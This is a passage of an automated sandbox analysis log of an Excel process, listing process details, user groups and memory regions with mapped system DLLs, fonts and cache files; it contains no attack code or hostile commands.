# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 30.08.2018 14:38:15.461 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files\\microsoft office\\office15\\excel.exe" page_root = "0x3a59d000" os_pid = "0x9ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\EXCEL.EXE\"" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 135 start_va = 0x20000 end_va = 0x21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 137 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 138 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 139 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 140 start_va = 0xd0000 end_va = 0x1cffff 
entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 141 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 142 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 143 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 144 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 145 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 146 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 147 start_va = 0x230000 end_va = 0x236fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 148 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 149 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 150 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 151 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 152 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 153 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000290000" filename = "" Region: id = 154 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 155 start_va = 0x2e0000 end_va = 0x2e4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 156 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 157 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 158 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 159 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 160 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 161 start_va = 0x1c10000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 162 start_va = 0x1d10000 end_va = 0x1d10fff entry_point = 0x0 region_type = private name = "private_0x0000000001d10000" filename = "" Region: id = 163 start_va = 0x1d20000 end_va = 0x1d20fff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 164 start_va = 0x1d30000 end_va = 0x1d30fff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 165 start_va = 0x1d40000 end_va = 0x1d40fff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 166 start_va = 0x1d50000 end_va = 0x1d50fff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 
167 start_va = 0x1d60000 end_va = 0x1d60fff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 168 start_va = 0x1d70000 end_va = 0x1d71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d70000" filename = "" Region: id = 169 start_va = 0x1d80000 end_va = 0x1d80fff entry_point = 0x1d80000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 170 start_va = 0x1d90000 end_va = 0x1dacfff entry_point = 0x1d90000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 171 start_va = 0x1db0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 172 start_va = 0x1dc0000 end_va = 0x1e9efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dc0000" filename = "" Region: id = 173 start_va = 0x1ea0000 end_va = 0x1ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 174 start_va = 0x1eb0000 end_va = 0x1ec1fff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 175 start_va = 0x1ed0000 end_va = 0x1ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 176 start_va = 0x1ee0000 end_va = 0x1ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 177 start_va = 0x1ef0000 end_va = 0x1ef0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 178 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 179 start_va = 0x1f80000 end_va = 0x1f80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 180 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 181 start_va = 0x1fa0000 end_va = 0x1fa0fff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 182 start_va = 0x1fb0000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 183 start_va = 0x2030000 end_va = 0x2042fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 184 start_va = 0x2050000 end_va = 0x2067fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 185 start_va = 0x2070000 end_va = 0x208efff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 186 start_va = 0x2090000 end_va = 0x209cfff entry_point = 0x2090000 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui") Region: id = 187 start_va = 0x20a0000 end_va = 0x20a0fff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 188 start_va = 0x20b0000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 189 start_va = 0x21b0000 end_va = 0x222efff entry_point = 0x21b0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: 
"c:\\windows\\fonts\\segoeui.ttf") Region: id = 190 start_va = 0x2230000 end_va = 0x2240fff entry_point = 0x2230000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 191 start_va = 0x2250000 end_va = 0x2251fff entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 192 start_va = 0x2260000 end_va = 0x2260fff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 193 start_va = 0x2270000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 194 start_va = 0x2370000 end_va = 0x263efff entry_point = 0x2370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 195 start_va = 0x2640000 end_va = 0x2a29fff entry_point = 0x2640000 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\xlintl32.dll") Region: id = 196 start_va = 0x2a30000 end_va = 0x2b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 197 start_va = 0x2b30000 end_va = 0x2b4efff entry_point = 0x0 region_type = private name = "private_0x0000000002b30000" filename = "" Region: id = 198 start_va = 0x2b50000 end_va = 0x2c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 199 start_va = 0x2c50000 end_va = 0x3042fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c50000" filename = "" Region: id = 200 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" 
Region: id = 201 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 202 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 203 start_va = 0x3080000 end_va = 0x3081fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003080000" filename = "" Region: id = 204 start_va = 0x3090000 end_va = 0x30aefff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 205 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 206 start_va = 0x30c0000 end_va = 0x30c0fff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 207 start_va = 0x30d0000 end_va = 0x30e6fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 208 start_va = 0x30f0000 end_va = 0x30f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 209 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 210 start_va = 0x3110000 end_va = 0x3124fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 211 start_va = 0x3130000 end_va = 0x313ffff entry_point = 0x0 region_type = private name = "private_0x0000000003130000" filename = "" Region: id = 212 start_va = 0x3140000 end_va = 0x3155fff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 213 start_va = 0x3160000 end_va = 0x3163fff entry_point = 0x3160000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" 
(normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 214 start_va = 0x3170000 end_va = 0x3170fff entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 215 start_va = 0x3180000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 216 start_va = 0x3280000 end_va = 0x32e3fff entry_point = 0x3280000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 217 start_va = 0x32f0000 end_va = 0x3308fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 218 start_va = 0x3310000 end_va = 0x3321fff entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 219 start_va = 0x3330000 end_va = 0x3346fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 220 start_va = 0x3350000 end_va = 0x3352fff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 221 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 222 start_va = 0x3370000 end_va = 0x346ffff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 223 start_va = 0x3470000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 224 start_va = 0x3570000 end_va = 0x3572fff entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 225 start_va = 0x3580000 end_va = 0x3582fff entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 226 start_va = 0x3590000 end_va = 0x3592fff entry_point = 0x0 region_type 
= private name = "private_0x0000000003590000" filename = "" Region: id = 227 start_va = 0x35a0000 end_va = 0x35affff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 228 start_va = 0x35b0000 end_va = 0x35b0fff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 229 start_va = 0x35c0000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 230 start_va = 0x35d0000 end_va = 0x3dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035d0000" filename = "" Region: id = 231 start_va = 0x3dd0000 end_va = 0x3dd1fff entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 232 start_va = 0x3de0000 end_va = 0x3de0fff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 233 start_va = 0x3df0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003df0000" filename = "" Region: id = 234 start_va = 0x3ef0000 end_va = 0x3f37fff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 235 start_va = 0x3f40000 end_va = 0x3f40fff entry_point = 0x0 region_type = private name = "private_0x0000000003f40000" filename = "" Region: id = 236 start_va = 0x3f50000 end_va = 0x3f50fff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 237 start_va = 0x3f60000 end_va = 0x3f60fff entry_point = 0x0 region_type = private name = "private_0x0000000003f60000" filename = "" Region: id = 238 start_va = 0x3f70000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 239 start_va = 0x4070000 end_va = 0x412ffff entry_point = 0x4070000 region_type = mapped_file name = "kernelbase.dll.mui" filename = 
"\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 240 start_va = 0x4130000 end_va = 0x4130fff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 241 start_va = 0x4140000 end_va = 0x423ffff entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 242 start_va = 0x4240000 end_va = 0x433ffff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 243 start_va = 0x4340000 end_va = 0x4340fff entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 244 start_va = 0x4350000 end_va = 0x4350fff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 245 start_va = 0x4360000 end_va = 0x4360fff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 246 start_va = 0x4370000 end_va = 0x4370fff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 247 start_va = 0x4380000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 248 start_va = 0x4480000 end_va = 0x487ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004480000" filename = "" Region: id = 249 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 250 start_va = 0x4980000 end_va = 0x4980fff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 251 start_va = 0x4990000 end_va = 0x4990fff entry_point = 0x0 region_type = private name = "private_0x0000000004990000" filename = "" Region: id = 252 start_va = 0x49a0000 end_va = 0x49a0fff entry_point = 0x0 region_type = private name = 
"private_0x00000000049a0000" filename = "" Region: id = 253 start_va = 0x49b0000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 254 start_va = 0x4a30000 end_va = 0x535ffff entry_point = 0x4a30000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 255 start_va = 0x5360000 end_va = 0x555ffff entry_point = 0x0 region_type = private name = "private_0x0000000005360000" filename = "" Region: id = 256 start_va = 0x5560000 end_va = 0x565ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 257 start_va = 0x5660000 end_va = 0x56f7fff entry_point = 0x5660000 region_type = mapped_file name = "segoeuisl.ttf" filename = "\\Windows\\Fonts\\SEGOEUISL.TTF" (normalized: "c:\\windows\\fonts\\segoeuisl.ttf") Region: id = 258 start_va = 0x5700000 end_va = 0x577ffff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 259 start_va = 0x5780000 end_va = 0x57c7fff entry_point = 0x0 region_type = private name = "private_0x0000000005780000" filename = "" Region: id = 260 start_va = 0x57d0000 end_va = 0x57d0fff entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 261 start_va = 0x57e0000 end_va = 0x5bdffff entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 262 start_va = 0x5be0000 end_va = 0x5c0ffff entry_point = 0x5be0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 263 start_va = 0x5c10000 
end_va = 0x5c13fff entry_point = 0x5c10000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 264 start_va = 0x5c20000 end_va = 0x5c21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c20000" filename = "" Region: id = 265 start_va = 0x5c30000 end_va = 0x5c31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c30000" filename = "" Region: id = 266 start_va = 0x5c40000 end_va = 0x5c40fff entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 267 start_va = 0x5c50000 end_va = 0x5c50fff entry_point = 0x0 region_type = private name = "private_0x0000000005c50000" filename = "" Region: id = 268 start_va = 0x5c60000 end_va = 0x5d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c60000" filename = "" Region: id = 269 start_va = 0x5d60000 end_va = 0x5dc5fff entry_point = 0x5d60000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 270 start_va = 0x5dd0000 end_va = 0x5ddffff entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 271 start_va = 0x5de0000 end_va = 0x61e0fff entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 272 start_va = 0x61f0000 end_va = 0x65f0fff entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 273 start_va = 0x6600000 end_va = 0x6a00fff entry_point = 0x0 region_type = private name = "private_0x0000000006600000" 
filename = "" Region: id = 274 start_va = 0x6a10000 end_va = 0x6c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a10000" filename = "" Region: id = 275 start_va = 0x6c10000 end_va = 0x740ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c10000" filename = "" Region: id = 276 start_va = 0x7410000 end_va = 0x78cffff entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 277 start_va = 0x78d0000 end_va = 0x7ccffff entry_point = 0x0 region_type = private name = "private_0x00000000078d0000" filename = "" Region: id = 278 start_va = 0x7cd0000 end_va = 0x84cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007cd0000" filename = "" Region: id = 279 start_va = 0x84d0000 end_va = 0x85cffff entry_point = 0x0 region_type = private name = "private_0x00000000084d0000" filename = "" Region: id = 280 start_va = 0x85d0000 end_va = 0x85d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000085d0000" filename = "" Region: id = 281 start_va = 0x85e0000 end_va = 0x85e3fff entry_point = 0x85e0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 282 start_va = 0x85f0000 end_va = 0x85f0fff entry_point = 0x85f0000 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 283 start_va = 0x8600000 end_va = 0x8603fff entry_point = 0x8600000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: 
"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 284 start_va = 0x8610000 end_va = 0x8610fff entry_point = 0x8610000 region_type = mapped_file name = "{b33c4f4b-938b-4cb1-bc05-f090b0a61a1a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{B33C4F4B-938B-4CB1-BC05-F090B0A61A1A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{b33c4f4b-938b-4cb1-bc05-f090b0a61a1a}.2.ver0x0000000000000001.db") Region: id = 285 start_va = 0x8620000 end_va = 0x8623fff entry_point = 0x8620000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 286 start_va = 0x8630000 end_va = 0x86affff entry_point = 0x0 region_type = private name = "private_0x0000000008630000" filename = "" Region: id = 287 start_va = 0x86b0000 end_va = 0x87affff entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 288 start_va = 0x87b0000 end_va = 0x87b0fff entry_point = 0x87b0000 region_type = mapped_file name = "{d299adbb-3c80-401e-9a81-68ee95177a1c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{D299ADBB-3C80-401E-9A81-68EE95177A1C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{d299adbb-3c80-401e-9a81-68ee95177a1c}.2.ver0x0000000000000001.db") Region: id = 289 start_va = 0x87c0000 end_va = 0x87c0fff entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 290 start_va = 0x87d0000 end_va = 0x87d0fff entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 291 start_va = 0x87e0000 end_va = 0x87e0fff entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 292 start_va = 0x87f0000 end_va = 0x87f7fff 
entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 293 start_va = 0x8890000 end_va = 0x890ffff entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 294 start_va = 0x8910000 end_va = 0x8d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000008910000" filename = "" Region: id = 295 start_va = 0x8d20000 end_va = 0x8e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000008d20000" filename = "" Region: id = 296 start_va = 0x8e40000 end_va = 0x8f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000008e40000" filename = "" Region: id = 297 start_va = 0x8fa0000 end_va = 0x909ffff entry_point = 0x0 region_type = private name = "private_0x0000000008fa0000" filename = "" Region: id = 298 start_va = 0x90d0000 end_va = 0x91cffff entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 299 start_va = 0x91f0000 end_va = 0x92effff entry_point = 0x0 region_type = private name = "private_0x00000000091f0000" filename = "" Region: id = 300 start_va = 0x9390000 end_va = 0x948ffff entry_point = 0x0 region_type = private name = "private_0x0000000009390000" filename = "" Region: id = 301 start_va = 0x9490000 end_va = 0x9c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009490000" filename = "" Region: id = 302 start_va = 0x9c90000 end_va = 0x9d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000009c90000" filename = "" Region: id = 303 start_va = 0x9e50000 end_va = 0x9e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 304 start_va = 0x9ee0000 end_va = 0x9fdffff entry_point = 0x0 region_type = private name = "private_0x0000000009ee0000" filename = "" Region: id = 305 start_va = 0xa0b0000 end_va = 0xa12ffff entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = 
"" Region: id = 306 start_va = 0xa1f0000 end_va = 0xa2effff entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 307 start_va = 0xa310000 end_va = 0xa40ffff entry_point = 0x0 region_type = private name = "private_0x000000000a310000" filename = "" Region: id = 308 start_va = 0xa4c0000 end_va = 0xa5bffff entry_point = 0x0 region_type = private name = "private_0x000000000a4c0000" filename = "" Region: id = 309 start_va = 0x37a50000 end_va = 0x37a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000037a50000" filename = "" Region: id = 310 start_va = 0x74360000 end_va = 0x743f7fff entry_point = 0x74360000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 311 start_va = 0x74400000 end_va = 0x744d1fff entry_point = 0x74400000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 312 start_va = 0x754c0000 end_va = 0x754f2fff entry_point = 0x754c0000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 313 start_va = 